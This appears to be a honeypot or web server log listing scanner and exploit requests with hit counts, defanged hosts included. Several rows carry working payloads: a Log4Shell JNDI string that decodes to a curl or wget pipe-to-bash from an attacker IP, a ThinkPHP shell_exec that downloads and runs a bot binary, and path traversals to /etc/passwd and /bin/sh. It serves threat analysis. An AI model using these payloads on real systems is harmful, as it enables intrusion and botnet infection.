| 4 | CONNECT | www[.]bing[.]com:443 |
HTTP/1.1 |
| 1 | GET | /${jndi:ldap://185[.]246[.]87[.]50:1389/Exploit} |
HTTP/1.1 |
| 23 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} |
HTTP/1.1 |
| 1 | GET | /HNAP1 |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /admin/images/demo-image.jpg |
HTTP/1.1 |
| 2 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
| 1 | GET | /clover/gui/login.jsf |
HTTP/1.1 |
| 1 | GET | /config/getuser?index=0 |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /console/framework/skins/wlsconsole/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(\"ahihi\") |
HTTP/1.1 |
| 1 | GET | /evox/about |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /fuel |
HTTP/1.1 |
| 1 | GET | /gameConfig.js?v=1640163559759 |
HTTP/1.1 |
| 1 | GET | /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /js/index.js |
HTTP/1.1 |
| 202 | GET | /phpmyadmin/ |
HTTP/1.1 |
| 1 | GET | /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%20cd%20/tmp;%20wget%20https[:]//raw[.]githubusercontent[.]com/ScorpionNetwork/NetBins/main/bins/sora.mips;%20chmod%20777%20*;%20./sora.mips%20yarn;%20rm%20-rf%20* |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /template/desktop/js/vlxx.js?v=2 |
HTTP/1.1 |
| 1 | GET | /text4041640188629 |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 4 | GET | http[:]//www[.]bing[.]com/ |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | //e3e7e71a0b28b5e96cc492e636722f73//4sVKAOvu3D//ABDYot0NxyG[.]php |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /_async/AsyncResponseService |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /sdk |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | POST | http[:]//deannecameron[.]website/2a535776a2230681d52b3b7c573bffef3948cb5dddba2b1fb37749ad3d86356cec347bff669ba24fd25a129f2c3065ac3fcae470147985d578b279ab94260db3dc2eda1d24c6534b39f14001f397490e255bd96d86d4a54bac42440166c5ce1e |
HTTP/1.1 |
| 1 | POST | http[:]//karenbaylor[.]site/36c46bdd0eb64b9ee1f93a1477965b3761a90a9352821ebace42797e30470a470cd4aaa8fe15da491d55ebb7b35dd0022ba1618a4cfd4191601f61d0aa9f30479f5a4855d9843178edd000e0b24475073dc0609daaeecd83e718ed000696b3de |
HTTP/1.1 |
| 1 | POST | http[:]//karenbaylor[.]site/8483c5b10c5c1af426bda29a5c9e8c3b4ce23b5c38b7673403011ec62d775dae6f1a51131bd96c277ebc38d7fd4a87f25c12421d0eb5c2e09249156103353a65d9418f64048a2f55b894a9ee9e825297a9be3982a04bb0244e7f34a5426c55d7 |
HTTP/1.1 |
| 1 | POST | http[:]//maryblack[.]xyz/798d0c666dead2c54504c7534c52737471ecd84d0bc4c46f797a8b27d214989ebcf795dec6422cc3b6e526d4c30d170a1b45ba33fc49e211266181d1909ec34bddbeea5c0fc6050485cc42d4047968fff8a8cb64bc536b7531840154eb0aa626 |
HTTP/1.1 |
